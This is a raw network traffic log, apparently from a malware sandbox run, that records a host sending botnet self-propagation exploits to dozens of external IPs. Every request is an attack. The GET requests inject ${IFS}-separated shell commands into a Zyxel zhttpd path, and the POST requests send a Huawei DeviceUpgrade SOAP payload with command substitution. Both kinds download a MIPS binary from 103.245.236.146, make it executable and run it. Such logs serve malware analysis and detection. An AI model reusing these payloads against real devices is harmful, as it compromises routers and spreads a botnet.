                                                        Jan 28, 2024 10:13:03.615331888 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7253192.168.2.144415098.15.26.194443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.615405083 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7254192.168.2.143789083.70.233.218443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.615406036 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7255192.168.2.145847425.149.169.240443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.615437031 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7256192.168.2.144109291.27.118.98443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.615485907 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7257192.168.2.1446582103.204.216.246443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.618859053 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7258192.168.2.1446018108.140.40.144443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.618880987 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7259192.168.2.1439424203.76.238.1237215
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.552268982 CET833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 476
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.245.236.146 -l /tmp/linuxxx -r /skyljnee.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                        Jan 28, 2024 10:13:05.421468019 CET833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 476
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.245.236.146 -l /tmp/linuxxx -r /skyljnee.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                        Jan 28, 2024 10:13:06.413495064 CET833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 476
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.245.236.146 -l /tmp/linuxxx -r /skyljnee.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                        Jan 28, 2024 10:13:08.397377968 CET833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 476
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.245.236.146 -l /tmp/linuxxx -r /skyljnee.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                        Jan 28, 2024 10:13:12.557214022 CET833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 476
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.245.236.146 -l /tmp/linuxxx -r /skyljnee.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7260192.168.2.1447104162.173.197.5443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.626542091 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7261192.168.2.1454636137.15.114.85443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.626585960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7262192.168.2.1442454116.232.69.189443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.626650095 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7263192.168.2.143524249.240.192.175443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.626701117 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7264192.168.2.1447258107.103.30.38443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.626729965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7265192.168.2.1438918176.103.83.7443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.626765966 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7266192.168.2.143306857.104.59.233443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.626806974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7267192.168.2.1447396148.57.1.221443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.626837969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7268192.168.2.1440928153.14.66.92443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.626873016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7269192.168.2.1434498168.177.72.162443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.626915932 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7270192.168.2.144358264.42.252.155443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.626957893 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7271192.168.2.145808282.9.58.247443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.626986980 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7272192.168.2.145073849.100.28.249443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.627018929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7273192.168.2.144461213.144.138.165443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.627048016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7274192.168.2.143800420.191.233.227443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.627101898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7275192.168.2.1443300220.113.163.108443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.627130032 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7276192.168.2.1453154168.8.27.236443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.627176046 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7277192.168.2.1446428206.173.180.192443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.627197981 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7278192.168.2.1451934158.171.219.155443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.627242088 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7279192.168.2.1459294122.11.1.212443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.627279997 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


